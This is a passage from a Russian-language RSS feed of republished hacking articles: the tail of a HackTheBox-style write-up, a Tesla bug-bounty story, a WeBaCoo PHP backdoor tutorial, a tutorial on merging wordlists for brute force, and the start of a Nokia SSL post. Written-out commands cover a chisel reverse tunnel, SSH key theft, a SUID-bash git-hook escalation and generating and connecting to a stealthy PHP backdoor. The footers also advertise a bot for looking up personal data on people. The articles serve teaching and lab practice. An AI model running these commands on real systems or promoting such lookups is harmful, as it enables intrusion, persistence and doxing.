  <p id="bZj3">Те­перь на уда­лен­ной машине ини­циали­зиру­ем кли­ент­скую часть. В парамет­рах ука­зыва­ем адрес сер­вера chisel и порт для под­клю­чения, а так­же нас­трой­ки прок­сирова­ния.</p>
  <p id="psok">1chisel.bin client 10.10.14.49:8000 R:3000:172.17.0.1:3000</p>
  <figure id="GjwT">
    <img src="https://img2.teletype.in/files/d8/a3/d8a33875-7d16-4963-9942-d21a278d0648.png" />
    <figcaption>Ло­ги кли­ент­ской час­ти</figcaption>
  </figure>
  <p id="nTJf">В логах сер­вера дол­жны уви­деть сооб­щение о соз­дании сес­сии.</p>
  <figure id="qUFw">
    <img src="https://img2.teletype.in/files/97/e9/97e9c99a-8965-4ce0-8d38-499eb5692f6a.png" />
    <figcaption>Ло­ги сер­верной час­ти</figcaption>
  </figure>
  <p id="XlpR">Та­ким обра­зом, весь тра­фик, который мы пош­лем на локаль­ный порт 3000, будет тун­нелиро­ван на порт 3000 ука­зан­ного хос­та (в дан­ном слу­чае 172.17.0.1) через докер‑машину. Теперь откро­ем сайт в бра­узе­ре и уви­дим Git.</p>
  <figure id="w3d1">
    <img src="https://img1.teletype.in/files/ca/81/ca810a43-5195-4b35-acbb-f20a23113b3c.png" />
    <figcaption>Глав­ная стра­ница сай­та на пор­те 3000</figcaption>
  </figure>
  <p id="DpJi">Вос­поль­зовав­шись учет­ными дан­ными, которые мы наш­ли в репози­тории, авто­ризу­емся на сай­те.</p>
  <figure id="cmmF">
    <img src="https://img4.teletype.in/files/f0/bb/f0bb73fd-ac39-442c-bd44-ef444ad96beb.png" />
    <figcaption>Глав­ная стра­ница сай­та пос­ле авто­риза­ции</figcaption>
  </figure>
  <p id="1IDY">Пе­рехо­дим к единс­твен­ному дос­тупно­му репози­торию и видим бэкап домаш­него катало­га поль­зовате­ля.</p>
  <figure id="9DME">
    <img src="https://img1.teletype.in/files/82/be/82be3bdf-46d7-46e0-b29f-21d028e1e812.png" />
    <figcaption>Со­дер­жимое Git-репози­тория</figcaption>
  </figure>
  <p id="rA1b">Ко­неч­но же, нас инте­ресу­ет при­ват­ный ключ SSH.</p>
  <figure id="NoiR">
    <img src="https://img3.teletype.in/files/a2/8d/a28d15e0-583d-4f24-ad61-c405adeaf492.png" />
    <figcaption>Со­дер­жимое катало­га .ssh</figcaption>
  </figure>
  <figure id="f97c">
    <img src="https://img1.teletype.in/files/01/78/017866f0-a6eb-4c21-8c66-63a8229fc227.png" />
    <figcaption>SSH-ключ поль­зовате­ля dev01</figcaption>
  </figure>
  <p id="IABk">Ко­пиру­ем его на локаль­ный хост, коман­дой chmod 0600 id_rsa наз­нача­ем необ­ходимые пра­ва и под­клю­чаем­ся с этим клю­чом уже к основно­му хос­ту.</p>
  <figure id="00uW">
    <img src="https://img4.teletype.in/files/f1/f8/f1f8350c-e679-4f1b-bb45-fcaede69367d.png" />
    <figcaption>Флаг поль­зовате­ля</figcaption>
  </figure>
  <p id="Lf90">Локальное повышение привилегий</p>
  <p id="gbz8">Пер­вым делом я, как обыч­но, поис­кал все сом­нитель­ные нас­трой­ки и поль­зователь­ские скрип­ты с помощью мно­гок­ратно упо­минав­шегося в моих рай­тапах LinPEAS, но ничего не нашел.</p>
  <p id="R2Xn">Сле­дующий шаг — монито­ринг запус­каемых при­ложе­ний. Что­бы най­ти запус­каемые в сис­теме про­цес­сы, будем исполь­зовать ути­литу pspy64. Заг­рузим ее на хост при помощи wget, а потом выпол­ним.</p>
  <p id="eW0p">В выводе отме­чаем исполь­зование коман­ды git, при­чем от име­ни при­виле­гиро­ван­ного поль­зовате­ля (нулевой UID — это root).</p>
  <figure id="NYlc">
    <img src="https://img3.teletype.in/files/ec/72/ec725a71-1c03-4d59-a21c-e5469631baf0.png" />
    <figcaption>Вы­вод ути­литы pspy64</figcaption>
  </figure>
  <p id="QhCd">Тут я обра­тил­ся к GTFOBins. Это база тех­ник, которые поз­воля­ют повысить при­виле­гии при помощи стан­дар­тных при­ложе­ний Linux. В час­тнос­ти, есть тех­ника исполь­зования Git, которая поз­воля­ет получить ста­биль­ную обо­лоч­ку в при­виле­гиро­ван­ном кон­тек­сте. Нам она под­ходит, толь­ко вмес­то кон­тек­ста sudo у нас будет кон­текст поль­зовате­ля root.</p>
  <figure id="5AQH">
    <img src="https://img2.teletype.in/files/d5/a4/d5a4c8a7-b19e-4f41-a72e-8077f9ecc396.png" />
    <figcaption>Опи­сание тех­ники sudo GTFOBins для Git</figcaption>
  </figure>
  <p id="JDtd">Здесь исполь­зует­ся перех­ватчик Git, который свя­зан с pre-commit. То есть мы можем записать свой скрипт в файл ~/.git/hooks/pre-commit, и код выпол­нится при выпол­нении коман­ды git commit. В качес­тве метода пер­систен­тнос­ти будем уста­нав­ливать S-бит фай­лу коман­дной обо­лоч­ки /bin/bash.</p>
  <p id="0xsN">12# echo &quot;chmod u+s /bin/bash&quot; &gt;&gt; ~/.git/hooks/pre-commitmv ~/.git/hooks/pre-commit.sample ~/.git/hooks/pre-commit</p>
  <figure id="N73J">
    <img src="https://img1.teletype.in/files/c6/08/c608f975-b161-4732-957c-758ec7d54449.png" />
    <figcaption>Со­дер­жимое фай­ла pre-commit</figcaption>
  </figure>
  <p id="5xVi">Справка: бит SUID</p>
  <p id="I08C">Ког­да у фай­ла уста­нов­лен атри­бут setuid (S-атри­бут), обыч­ный поль­зователь, запус­кающий этот файл, получа­ет повыше­ние прав до поль­зовате­ля — вла­дель­ца фай­ла в рам­ках запущен­ного про­цес­са. Пос­ле получе­ния повышен­ных прав при­ложе­ние может выпол­нять задачи, которые недос­тупны обыч­ному поль­зовате­лю. Из‑за воз­можнос­ти сос­тояния гон­ки мно­гие опе­раци­онные сис­темы игно­риру­ют S-атри­бут, уста­нов­ленный shell-скрип­там.</p>
  <p id="V37u"><a href="https://spy-soft.net/hacking-remote-host-via-git/" target="_blank">Источник</a></p>
  <figure id="9icx">
    <img src="https://img4.teletype.in/files/f3/21/f321894a-18ef-4f4c-8ec5-c93d98dc8d69.png" />
  </figure>
  <p id="CxHl"><strong>Наши проекты:</strong></p>
  <p id="iSeJ">- Кибер новости: <a href="https://t.me/matrixleaked" target="_blank"><strong>the Matrix</strong></a><br />- Хакинг: <a href="https://t.me/+bby6PJAbqpNhOWZh" target="_blank"><strong>/me Hacker</strong></a><br />- Кодинг: <a href="https://t.me/+zBgEm0olmpxlMzA6" target="_blank"><strong>Minor Code</strong></a><br />👁 Пробить человека? Легко через нашего бота: <a href="https://t.me/iprobivator_bot" target="_blank"><strong>Мистер Пробиватор</strong></a></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@matrix_supp/Vot-kak-vzlomal-sajt-Tesla-i-poluchil-10000-10-10</guid><link>https://teletype.in/@matrix_supp/Vot-kak-vzlomal-sajt-Tesla-i-poluchil-10000-10-10?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=matrix_supp</link><comments>https://teletype.in/@matrix_supp/Vot-kak-vzlomal-sajt-Tesla-i-poluchil-10000-10-10?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=matrix_supp#comments</comments><dc:creator>matrix_supp</dc:creator><title>Вот как взломал сайт Tesla и получил 10.000$</title><pubDate>Mon, 10 Oct 2022 07:58:09 GMT</pubDate><media:content medium="image" url="https://img4.teletype.in/files/f5/3c/f53c1b25-4e66-4430-9eba-499c4776ed9b.png"></media:content><description><![CDATA[<img src="https://img3.teletype.in/files/68/ba/68badaac-e05c-41b3-9150-2997d7cccd02.png"></img>Многие хотят заниматься багхантингом и участвовать в программах Багбаунти, но боятся начать. Я Xail, днем пентестер в хакерской команде Red Team, по ночам багхантер. В этой короткой статье я поделюсь своим кейсом взлома сайта Tesla. Я покажу, как с легкостью смог найти уязвимость класса P1 и заработать на этом немного денег. Надеюсь, мой опыт послужит для вас хорошим примером и будет мотивировать. Погнали!]]></description><content:encoded><![CDATA[
  <figure id="vws0">
    <img src="https://img3.teletype.in/files/68/ba/68badaac-e05c-41b3-9150-2997d7cccd02.png" />
  </figure>
  <p id="PTjP">Многие хотят заниматься багхантингом и участвовать в программах Багбаунти, но боятся начать. Я Xail, днем пентестер в хакерской команде Red Team, по ночам багхантер. В этой короткой статье я поделюсь своим кейсом взлома сайта Tesla. Я покажу, как с легкостью смог найти уязвимость класса P1 и заработать на этом немного денег. Надеюсь, мой опыт послужит для вас хорошим примером и будет мотивировать. Погнали!</p>
  <p id="7Fu0">Еще по теме: <a href="https://spy-soft.net/nasa-hack/" target="_blank">Вот как я взломал сайт NASA</a></p>
  <p id="Bn9I">Заранее предупреждаю, не ожидайте ничего особо умного. Это был низко висящий фрукт, который можно было сорвать без особых усилий и знаний, но в этом и заключается фишка, кто не хочет без труда сорвать бабла?!</p>
  <p id="rM7i">Багбаунти не имеет никакого отношения к батончику с райским вкусом, — это программа, которую владелец сайта (web-приложения) проводит для привлечения сторонних специалистов в области ИБ к поиску уязвимостей. При участии в программе Bug Bounty нужно действовать этично и придерживаться установленных правил. Не забывайте, что несанкционированный взлом является незаконным и расценивается, как уголовное преступление. Ни редак­ция spy-soft.net, ни автор не несут ответс­твен­ность за ваши незаконных действия.<strong>Взломал сайт Tesla и получил 10.000$</strong></p>
  <p id="t405">26 февраля 2021 года в рамках программы багбаунти я сообщил об обнаруженной мною уязвимости на сайте Tesla. Уязвимость позволила мне получить доступ к конфиденциальной информации, наиболее важной из которых был общий <a href="https://ru.wikipedia.org/wiki/IKE" target="_blank">ключ IKE</a>, который можно было использовать для подключения к корпоративной сети Tesla.</p>
  <p id="eqtQ">Вот как все было. После <a href="https://spy-soft.net/find-subdomains-online/" target="_blank">поиска поддоменов</a> и определения серверов, которые прослушивают TCP-порты 80 и 443, я решил зарядить <a href="https://spy-soft.net/dirbuster-linux-windows/" target="_blank">Dirbuster</a> со стандартным списком слов.</p>
  <p id="aUWE">Через нескольких часов сканирования, обнаружил интересную вещь. Было включено индексирование на:</p>
  <p id="FqRO">1https://trt.teslamotors.com</p>
  <p id="zFTR">в каталоге:</p>
  <p id="jy3d">1/uploads</p>
  <p id="PbmE">Это означало, что я мог просматривать все файлы, которые находились в директории.</p>
  <p id="Vxu0">Просмотрев различные файлы в каталоге/uploads, я обнаружил файл .zip с именем <strong>pdx01.zip</strong>. Долго не думая, скачал его на <a href="https://spy-soft.net/virtualnaya-mashina-virtualbox/" target="_blank">виртуалке</a> и обнаружил внутри несколько файлов конфигурации.</p>
  <p id="qCNk">Среди этих файлах мне удалось найти общий ключ VPN, который позволяет аутентифицироваться в корпоративной сети Tesla.</p>
  <p id="mD8G">Я также нашел пароли WiFi магазинов Tesla и пароли Radius.</p>
  <figure id="2o39">
    <img src="https://img1.teletype.in/files/87/dc/87dc789d-c159-4fa4-8f46-a9ef7ca8d3fc.png" />
    <figcaption>Файлы конфигурации, содержащие хэши и пароли в открытом виде</figcaption>
  </figure>
  <p id="wOCf">Я сразу же сообщил об этой проблеме Tesla через их программу BugCrowd Bug Bounty. Работники Tesla быстро отреагировали, приняли уязвимость, пометили ее как P1 (высокий уровень угрозы) и устранили проблему. После чего скинули мне 10.000$.</p>
  <p id="mIcA">Вот как выглядит моя находка на сайте программы поощрений Tesla.</p>
  <p id="cU2U">Спасибо Тесла — это отличный пример компании, которая серьезно относится к безопасности и вознаграждает тех, кто помогает им выявлять и устранять проблемы. Ну и отдельное спасибо за 10.000$, на улице такие деньги не валяются.</p>
  <p id="arWD">Как видите взламывать сайты Тесла, не только прикольно, но и выгодно. Хотя и взломом это трудно назвать )</p>
  <p id="VwkC"><strong>РЕКОМЕНДУЮ:</strong></p>
  <ul id="DN4P">
    <li id="MNHc"><a href="https://spy-soft.net/hack-dutch-government-site/" target="_blank">Взлом правительственного сайта Нидерландов</a></li>
    <li id="MtmC"><a href="https://spy-soft.net/tools-to-find-vulnerabilities/" target="_blank">Лучшие инструменты для поиска уязвимостей сайтов</a></li>
  </ul>
  <p id="aIcU"><a href="https://spy-soft.net/hack-tesla-site/" target="_blank">Источник</a></p>
  <figure id="sIhf">
    <img src="https://img4.teletype.in/files/f3/21/f321894a-18ef-4f4c-8ec5-c93d98dc8d69.png" />
  </figure>
  <p id="PH99"><strong>Наши проекты:</strong></p>
  <p id="U6pX">- Кибер новости: <a href="https://t.me/matrixleaked" target="_blank"><strong>the Matrix</strong></a><br />- Хакинг: <a href="https://t.me/+bby6PJAbqpNhOWZh" target="_blank"><strong>/me Hacker</strong></a><br />- Кодинг: <a href="https://t.me/+zBgEm0olmpxlMzA6" target="_blank"><strong>Minor Code</strong></a><br />👁 Пробить человека? Легко через нашего бота: <a href="https://t.me/iprobivator_bot" target="_blank"><strong>Мистер Пробиватор</strong></a></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@matrix_supp/Ispolzovanie-We-Ba-Coo-dlya-sozdaniya-behkdora-PHP-10-01</guid><link>https://teletype.in/@matrix_supp/Ispolzovanie-We-Ba-Coo-dlya-sozdaniya-behkdora-PHP-10-01?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=matrix_supp</link><comments>https://teletype.in/@matrix_supp/Ispolzovanie-We-Ba-Coo-dlya-sozdaniya-behkdora-PHP-10-01?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=matrix_supp#comments</comments><dc:creator>matrix_supp</dc:creator><title>Использование WeBaCoo для создания бэкдора PHP</title><pubDate>Sat, 01 Oct 2022 14:57:54 GMT</pubDate><media:content medium="image" url="https://img1.teletype.in/files/06/f0/06f01778-5148-49a1-8f15-8e5c3307faef.png"></media:content><description><![CDATA[<img src="https://img4.teletype.in/files/3b/aa/3baa3f16-44df-4d3a-8d0c-cb3a38860510.png"></img>WeBaCoo (Web Backdoor Cookie) — скрипт для создания бэкдора PHP (скрытого соединения между клиентом и веб-сервером через HTTP). Это инструмент пост-эксплуатации, способный поддерживать доступ к скомпрометированному веб-серверу. В этой статье я познакомлю с WeBaCoo и покажу как его использовать на Kali Linux.]]></description><content:encoded><![CDATA[
  <figure id="cLyo">
    <img src="https://img4.teletype.in/files/3b/aa/3baa3f16-44df-4d3a-8d0c-cb3a38860510.png" />
  </figure>
  <p id="3gHI">WeBaCoo (Web Backdoor Cookie) — скрипт для создания бэкдора PHP (скрытого соединения между клиентом и веб-сервером через HTTP). Это инструмент пост-эксплуатации, способный поддерживать доступ к скомпрометированному веб-серверу. В этой статье я познакомлю с WeBaCoo и покажу как его использовать на Kali Linux.</p>
  <p id="zR2c">Еще по теме: <a href="https://spy-soft.net/icmp-tunnelling-pentest/" target="_blank">ICMP-туннелирование при пентесте</a></p>
  <p id="1FDI"><strong>Что такое WeBaCoo</strong></p>
  <p id="M9Nr">WeBaCoo — этот скрипт Perl для создания бэкдора и удаленного скрытого подключения к веб-серверу. Инструмент был разработан для работы под радаром современных антивирусов, NIDS (систем обнаружения), IPS (систем предотвращения вторжений), сетевых брандмауэров и брандмауэров приложений.</p>
  <p id="ygjm">Статья написана в образовательных целях, для обучения этичных хакеров. При демонстрации работы были использованы личные устройства автора. Использование подобных инструментов без надлежащего письменного разрешения, является незаконным и будет расцениваться, как уголовное преступление. Ни редак­ция spy-soft.net, ни автор не несут ответс­твен­ность за ваши действия.</p>
  <p id="HSPE">Инструмент имеет два режима работы:</p>
  <ul id="Axbb">
    <li id="cO7d">Генерация (-g) — режим для создания бэкдора PHP.</li>
    <li id="R5aq">Терминал (-t) — режим для подключения к бэкдору.</li>
  </ul>
  <p id="PlYZ">Интересная особенность WeBaCoo заключается в том, что соединение между веб-сервером и клиентом закодировано в файле cookie заголовка HTTP, поэтому его трудно обнаружить антивирусом, системами обнаружения / предотвращения сетевых вторжений, сетевыми брандмауэрами и брандмауэрами приложений.</p>
  <p id="Snod"><strong>Установка WeBaCoo</strong></p>
  <p id="XEk0">WeBaCoo уже предустановлен на Kali Linux, но если вы используете другой дистрибутив, тогда можете установить черезapt:</p>
  <p id="foLZ">1sudo apt install webacoo</p>
  <p id="ctiv"><strong>Использование WeBaCoo для создания скрытого соединения</strong></p>
  <p id="CI6g">Сначала по традиции заглянем в справку WeBaCoo:</p>
  <p id="lEG2">1webacoo -h</p>
  <p id="pXse">Теперь используя WeBaCoo, создадим бэкдор PHP:</p>
  <p id="Zmkv">1webacoo -g -o /home/kali/testbackdoor.php</p>
  <p id="yTCz">В приведенной выше команде, мы используем параметр-g для создания бэкдора и параметр-o для выбора местоположения созданного файла (в моем случае — домашний каталог):</p>
  <p id="2Db6">1home/kali</p>
  <p id="wmkM">После выполнения команды будет создан бэкдор PHP.</p>
  <p id="hQsa">Теперь пришло время загрузить его на уязвимый сервер или сайт. Здесь мы предполагаем, что сервер не имеет никаких ограничений, которые могут запрещать определенные расширение или типы загружаемого файла.</p>
  <p id="LIoz">Для этого примера, загрузим его на специально уязвимое веб-приложение DVWA, созданное для таких, как мы (этичных хакеров).</p>
  <p id="RvY8">После успешной загрузки, будет отображен путь к загруженному файлу (см. скрин выше). Этот путь является фактическим местоположением загруженного файла. Он нужен нам для доступа к полезной нагрузке.</p>
  <p id="TaMH">Теперь можем получить доступ к бэкдору PHP с помощью WeBaCoo. Для этого в терминале выполняем команду:</p>
  <p id="EjHZ">1webacoo -t -u http://127.8.0.1/hackable/uploads/testbackdoor.php</p>
  <p id="wNAX">После применения вышеуказанной команды, вы увидите сообщение о подключение бэкдора. Чтобы проверить работу бэкдора, запустим несколько команд.</p>
  <p id="rvdv">С помощью префикса: можно управлять бекдором, выполняя различные команды. Со всеми <a href="https://github.com/anestisb/WeBaCoo" target="_blank">остальными фишками</a>, разберетесь сами.</p>
  <p id="eK4w">Вот как можно создать бэкдор PHP с помощью WeBaCo и использовать его для удаленного подключения.</p>
  <p id="HuXK">Как видите WeBaCoo очень прост в использовании, но используйте тулзу с умом, не нарушая закон!</p>
  <p id="PMpk"><strong>РЕКОМЕНДУЕМ:</strong></p>
  <ul id="YEoD">
    <li id="YqyB"><a href="https://spy-soft.net/hacking-web-server-php/" target="_blank">Взлом веб-сервера на PHP</a></li>
    <li id="CYOY"><a href="https://spy-soft.net/hackthebox-knife/" target="_blank">Эксплуатация бэкдора PHP на виртуалке Knife HackTheBox</a></li>
  </ul>
  <p id="Nadd"><a href="https://spy-soft.net/webacoo/" target="_blank">Источник</a></p>
  <figure id="P56X">
    <img src="https://img4.teletype.in/files/f3/21/f321894a-18ef-4f4c-8ec5-c93d98dc8d69.png" />
  </figure>
  <p id="HUvG"><strong>Наши проекты:</strong></p>
  <p id="JuK2">- Кибер новости: <a href="https://t.me/matrixleaked" target="_blank"><strong>the Matrix</strong></a><br />- Хакинг: <a href="https://t.me/+bby6PJAbqpNhOWZh" target="_blank"><strong>/me Hacker</strong></a><br />- Кодинг: <a href="https://t.me/+zBgEm0olmpxlMzA6" target="_blank"><strong>Minor Code</strong></a><br />👁 Пробить человека? Легко через нашего бота: <a href="https://t.me/iprobivator_bot" target="_blank"><strong>Мистер Пробиватор</strong></a></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@matrix_supp/Rabota-s-bolshimi-slovaryami-dlya-bruta-na-Kali-Linux-09-28</guid><link>https://teletype.in/@matrix_supp/Rabota-s-bolshimi-slovaryami-dlya-bruta-na-Kali-Linux-09-28?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=matrix_supp</link><comments>https://teletype.in/@matrix_supp/Rabota-s-bolshimi-slovaryami-dlya-bruta-na-Kali-Linux-09-28?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=matrix_supp#comments</comments><dc:creator>matrix_supp</dc:creator><title>Работа с большими словарями для брута на Kali Linux</title><pubDate>Wed, 28 Sep 2022 07:35:21 GMT</pubDate><media:content medium="image" url="https://img4.teletype.in/files/76/57/76574b46-8f72-405d-aaa6-f3b0fa867044.png"></media:content><description><![CDATA[<img src="https://img3.teletype.in/files/2a/a1/2aa1e038-5e9b-4204-a3e4-98f9ebeb72e4.png"></img>В пентестах и в форензике часто используют атаку Брутфорс (брут). Но успешный брут зависит не только от длины посоха пароля, но и от хорошего словаря. Чтобы подобрать пароль, может потребоваться большой список паролей и логинов. Работа с хорошими большими словарями для брута может быть довольно затруднительна. В этой статье я познакомлю вас, с инструментами Kali Linux, которые облегчат эту задачу.]]></description><content:encoded><![CDATA[
  <figure id="pIlD">
    <img src="https://img3.teletype.in/files/2a/a1/2aa1e038-5e9b-4204-a3e4-98f9ebeb72e4.png" />
  </figure>
  <p id="tYeU">В пентестах и в форензике часто используют атаку Брутфорс (брут). Но успешный брут зависит не только от длины посоха пароля, но и от хорошего словаря. Чтобы подобрать пароль, может потребоваться большой список паролей и логинов. Работа с хорошими <a href="https://spy-soft.net/bolshoj-slovar-dlya-bruta/" target="_blank">большими словарями для брута</a> может быть довольно затруднительна. В этой статье я познакомлю вас, с инструментами Kali Linux, которые облегчат эту задачу.</p>
  <p id="xWzo">Еще по теме: <a href="https://spy-soft.net/ogromnyj-slovar-dlya-bruta-anglijskie-slova/" target="_blank">Огромный словарь для брута (Английские слова)</a></p>
  <p id="oySj"><strong>Работа с большими словарями для брута на Kali Linux</strong></p>
  <p id="5mGl">Манипуляции с большими текстовыми файлами — это всегда неприятные ощущения и геморрой. Если вы когда-нибудь пытались отредактировать текстовый файл размером 10 ГБ на ноутбуке среднего класса, то понимаете о чем я говорю.</p>
  <p id="hi74">В этой ситуации можно использовать два инструмента — Dymerge и просто команды оболочки Bash.</p>
  <h3 id="Работа-с-большими-словарями-для-брута-с-помощью-Dymerge">Работа с большими словарями для брута с помощью Dymerge</h3>
  <p id="nq2C"><a href="https://github.com/k4m4/dymerge" target="_blank">Dymerge</a> — это скрипт Python для работы словарями для брута. Это простой консольный инструмент, который может объединять словари для брута или добавлять / удалять определенные слова из списка слов.</p>
  <p id="pY51">Для установки Dymerge на Kali Linux:</p>
  <p id="pZ9J">1git clone https://github.com/k4m4/dymerge</p>
  <figure id="PsUJ">
    <img src="https://img3.teletype.in/files/63/7b/637b79d1-e9b0-40e8-bf43-86390da83c7f.png" />
  </figure>
  <p id="4DAe">Преходим в каталог dymerge:</p>
  <p id="yZrR">1cd dymerge</p>
  <p id="ctFk">С помощью команду ls отобразим содержимое:</p>
  <p id="Q8pB">1ls</p>
  <p id="OJ6z">Среди файлов находим скрипт Python <strong>dymerge.py</strong>.</p>
  <p id="yNgT">По традиции открываем справку:</p>
  <p id="Y7Fs">1python dymerge.py --help</p>
  <p id="2KlZ">Видим параметры и возможности.</p>
  <p id="zauZ">Итак, на рабочий стол я закинул словари для брута.</p>
  <p id="l82T">Попробуем объединить все текстовые файлы в один большой словарь, а на выходе заархивируем его, чтобы он не занимал много места.</p>
  <p id="4jzA">Параметр -o используем для выбора местоположения конечного файла и формата.</p>
  <p id="TDNF">Можно также добавить отдельные слова в конечный файл, (добавим, на пример, слово KaliLinuxIn), для этого используем директиву -i.</p>
  <p id="6tuH">Параметр-u позволяет удалить повторяющиеся пароли.</p>
  <p id="g6PD">Со всеми нашими хотелками, команда будет выглядеть так:</p>
  <p id="rnwP">1python dymerge.py /home/kali/Desktop/my-wordlists -u -f -o /home/kali/Desktop/my-wordlistsgiantwordlist.txt -i KaliLinuxIn -z bz2</p>
  <p id="rjIr">После выполнения видим следующее:</p>
  <p id="qVsd">Дождитесь окончания процесса. Скорость работы зависит от размера и мощности компьютера.</p>
  <p id="1Zi5">После завершения, в каталоге появился архив «giant-wordlist.txt.bz2.</p>
  <p id="S1UX">Так работает Dymerge. В целом это хороший инструмент, но он плохо работает с огромными файлами. Это связано с тем, что он загружает каждое слово из каждого словаря в массив, что может вызвать зависания.</p>
  <p id="PLzY">Его можно заменить командами оболочки Bash.</p>
  <h3 id="Командами-оболочки-Bash-—-хорошая-альтернатива-DyMerge">Командами оболочки Bash — хорошая альтернатива DyMerge</h3>
  <p id="HiqE">Вот некоторые варианты использования Dymerge и аналог команды оболочки Bash.</p>
  <p id="c0Mz">Команда Dymerge:</p>
  <p id="a3ER">1python dymerge.py /usr/share/wordlists/rockyou.txt /lists/cewl.txt -s -u</p>
  <p id="IKOY">Аналог Bash:</p>
  <p id="PgHA">1sort -u /usr/share/wordlists/rockyou.txt /lists/cewl.txt &gt; output.txt</p>
  <p id="S49o">Команда Dymerge:</p>
  <p id="3II0">1python dymerge.py /lists/cewl.txt /lists/awlg.txt -s -u -i Passw0rd,inpuT</p>
  <p id="ima2">Аналог Bash:</p>
  <p id="rGR6">1sort -u /lists/cewl.txt /lists/awlg.txt &lt;(echo &#x27;Passw0rd\ninpuT&#x27;) &gt; output.txt</p>
  <p id="bqmO">Команда Dymerge:</p>
  <p id="n2Aq">1python dymerge.py ~/fsocity.dic -s -u -r -o ~/clean.txt</p>
  <p id="Ju1L">Аналог Bash:</p>
  <p id="USgf">1sort -r &lt;~/fsocity.dic | uniq&gt; clean.txt</p>
  <p id="G1ry">Команда Dymerge:</p>
  <p id="ikal">1python dymerge.py /dicts/crunch.txt /dicts/john.txt -s -u -f -z bz2</p>
  <p id="hi7C">Аналог Bash:</p>
  <p id="N4Tn">1sort -u /dicts/crunch.txt /dicts/john.txt | bzip2 &gt; output.bz2</p>
  <p id="IlS7">С помощью рассмотренных инструментов, вы сможете добавлять, удалять слова (и не только) и обеднять большие словари для брута. Какой инструмент использовать, выбирать только вам.</p>
  <p id="btRS">На сегодня все. Встретимся в следующей статье!</p>
  <p id="6KCq"><strong>РЕКОМЕНДУЕМ:</strong></p>
  <ul id="3O5C">
    <li id="lkEx"><a href="https://spy-soft.net/kak-sozdat-slovar-dlya-bruta-v-kali-linux/" target="_blank">Создание словарей для брута на Kali Linux</a></li>
    <li id="6esw"><a href="https://spy-soft.net/rockyou-txt/" target="_blank">Где находится в Kali Linux популярный словарь Rockyou.txt?</a></li>
  </ul>
  <p id="U8c1"><a href="https://spy-soft.net/manage-big-passwordlists/" target="_blank">Источник</a></p>
  <figure id="BWsA">
    <img src="https://img4.teletype.in/files/f3/21/f321894a-18ef-4f4c-8ec5-c93d98dc8d69.png" />
  </figure>
  <p id="Ju9D"><strong>Наши проекты:</strong></p>
  <p id="V6QW">- Кибер новости: <a href="https://t.me/matrixleaks" target="_blank"><strong>the Matrix</strong></a><br />- Хакинг: <a href="https://t.me/+bby6PJAbqpNhOWZh" target="_blank"><strong>/me Hacker</strong></a><br />- Кодинг: <a href="https://t.me/+zBgEm0olmpxlMzA6" target="_blank"><strong>Minor Code</strong></a><br />👁 Пробить человека? Легко через нашего бота: <a href="https://t.me/iprobivator_bot" target="_blank"><strong>Мистер Пробиватор</strong></a></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@matrix_supp/Nashel-uyazvimosti-na-sajte-Nokia-s-pomoshchyu-Google-Dorks-09-26</guid><link>https://teletype.in/@matrix_supp/Nashel-uyazvimosti-na-sajte-Nokia-s-pomoshchyu-Google-Dorks-09-26?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=matrix_supp</link><comments>https://teletype.in/@matrix_supp/Nashel-uyazvimosti-na-sajte-Nokia-s-pomoshchyu-Google-Dorks-09-26?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=matrix_supp#comments</comments><dc:creator>matrix_supp</dc:creator><title>Нашел уязвимости на сайте Nokia с помощью Google Dorks</title><pubDate>Mon, 26 Sep 2022 11:23:30 GMT</pubDate><media:content medium="image" url="https://img2.teletype.in/files/96/f5/96f5e158-9df1-40c5-9ea2-e177b0f7aaff.png"></media:content><description><![CDATA[<img src="https://img2.teletype.in/files/d9/c6/d9c61f93-9eb4-4dd6-a39a-7ccab005993b.png"></img>Здравствуйте, господа багхантеры! Меня зовут Джениш Паншал и в этой короткой статье я расскажу об уязвимости, связанной с неправильной конфигурацией SSL, и о том, как мне удалось, с помощью простого Гугл Дорка, найти эту уязвимость на сайтах Nokia и Кембриджского университета.]]></description><content:encoded><![CDATA[
  <figure id="SPuI">
    <img src="https://img2.teletype.in/files/d9/c6/d9c61f93-9eb4-4dd6-a39a-7ccab005993b.png" />
  </figure>
  <p id="sPNN">Здравствуйте, господа багхантеры! Меня зовут Джениш Паншал и в этой короткой статье я расскажу об уязвимости, связанной с неправильной конфигурацией SSL, и о том, как мне удалось, с помощью простого Гугл Дорка, найти эту уязвимость на сайтах Nokia и Кембриджского университета.</p>
  <p id="StMi">Еще по теме: <a href="https://spy-soft.net/postgresql-vulnerabilities/" target="_blank">Интересные уязвимости PostgreSQL</a></p>
  <p id="8psZ"><strong>Уязвимости на сайте Nokia и Кембриджского университета</strong></p>
  <p id="Ki5J">Неправильная конфигурация SSL (SSL Misconfiguration) позволяет инициировать атаку «человек посередине», притворяясь веб-сервером, пока клиент не согласится использовать для подключения шифрование SSL 3.0. Затем злоумышленник получает нужную информацию с помощью автоматизированных инструментов, которые изменяют блоки заполнения и ждут ответа сервера. Подробнее рассказывалось в статье «<a href="https://spy-soft.net/ssl-tls-vulnerabilities/" target="_blank">Уязвимости SSL и TLS-протокола</a>»</p>
  <p id="ABpK">Bug Bounty — это программа, которую владелец сайта (web-приложения) проводит для привлечения сторонних специалистов в области ИБ к поиску уязвимостей. При участии в программе Bug Bounty нужно действовать этично и придерживаться установленных правил. Не забывайте, что несанкционированный взлом является незаконным и расценивается, как уголовное преступление. Ни редак­ция spy-soft.net, ни автор не несут ответс­твен­ность за ваши действия.</p>
  <p id="ticy">Google Dork Queries — это набор поисковых запросов для выявления грубейших дыр в безопасности. Всего, что должным образом не спрятано от поисковых роботов.</p>
  <p id="7mDL">Для краткости такие запросы называют Гугл Дорки или просто дорками, как и тех админов, чьи ресурсы удалось взломать с помощью GDQ. Подробнее о Гугл Дорках и примерах использования, в статье «<a href="https://spy-soft.net/gugl-dorki/" target="_blank">Что такое Google Dorks</a>».</p>
